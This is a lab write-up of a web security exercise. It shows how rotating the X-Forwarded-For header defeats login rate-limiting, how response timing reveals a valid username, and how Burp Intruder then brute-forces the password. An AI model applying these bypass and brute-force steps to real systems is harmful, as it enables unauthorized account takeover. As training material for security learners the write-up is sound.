After logging in with given valid username and password, I looked around to see the application, there wasnot anything of intresting.
Then i planned to logout and intercept the request when re loggin in.
send the intercept to repeater ctrl + R
When i was digging around by sending multiple incorrect password, I noticed this application has some form of brute-force protection.
Lets try to bypass this protection
Inserting X-Forwarded-For
(XFF) request header easily bypasses this protection. 1
in above example is a dummy ip address. When ever we are blocked after certain incorrect attempt we can change the value of X-Forwaded-For
and we are ready to go.
The X-Forwarded-For (XFF) request header is a de-facto standard header for identifying the originating IP address of a client connecting to a web server through a proxy server
Now we have solved the blocking issue, lets focus on our goal.
I tried entering wrong password and wrong username to check the change in response time.
After some digging :
When i enter wrong username it does not checks the password.
meaning the response code is faster.
When i enter correct username then it starts checking the password.
In this case i have entered very long password so it took longer time to give response.
SO what we can conclude from this is:
- The web app first checks the username, if the username is correct then only it checks the password.
- If the username is incorrect then it does not checks the password and gives Invalid username and password response.
From this conclusion we can enumerate the valid password.
Here is what we are going to do.
We will put long password. In case of username we will use provided wordlist. Burp will iterate all the username.
Web app will first check the username first.
- If the username is incorrect the response time will be faster
- If the username is correct then it will move to check the password, since we have provided a long password it will take longer response time.
Using this difference in response we can find the correct username.
send this request to Intruder ctrl + I
In intruder:
1. First click on clear. This will remove any payload position which might be selected by default
2. The select the X-Forwarded-For
value. This is because, for every request we want to change our ip so that we will not be blocked.
3. Then click Add
to set payload position
4. Then select the username field
5. Then click on Add
to set payload position
6. select the attack type pitchfork
In Payload section:
- Select Payload set 1
- Set payload type number
- Set from 5
; because i have already used ip 5
- set to 106
; because there are 101
usernames and we need new ip for each username
- set step 1
Now select payload set 2
- select payload type Simple list
- and paste
the username ; username list is provided in lab
Then start attack
In the result we can see all other result have lower response time but one has higher response time. According to our theory
This username is correct and since the username is correct web app tried checking the password. since we have provided very long password the response time is long.
So this should be the valid username.
Now its time to brute force password
Password brute forcing is same as username
just remove payload position of users . In users field put the valid username we just found.
Then select the password field and and click add
to set it as second payload position.
Make sure X-Forwarded-For
field is also set as payload position
In payload section (for payload set1)
change the from to 107
change to
to 208
In payload section (for payload set2)
Paste password list which is provided in lab:
Then start attack
And we got 302
status code.
Lets try to login with this password and username we found
When I try to login it gives timeout.
lets fire up burp
enter the username and password we found and intercept the request
Add X-Forwarded-For
header and then Forward the request
Successfully completed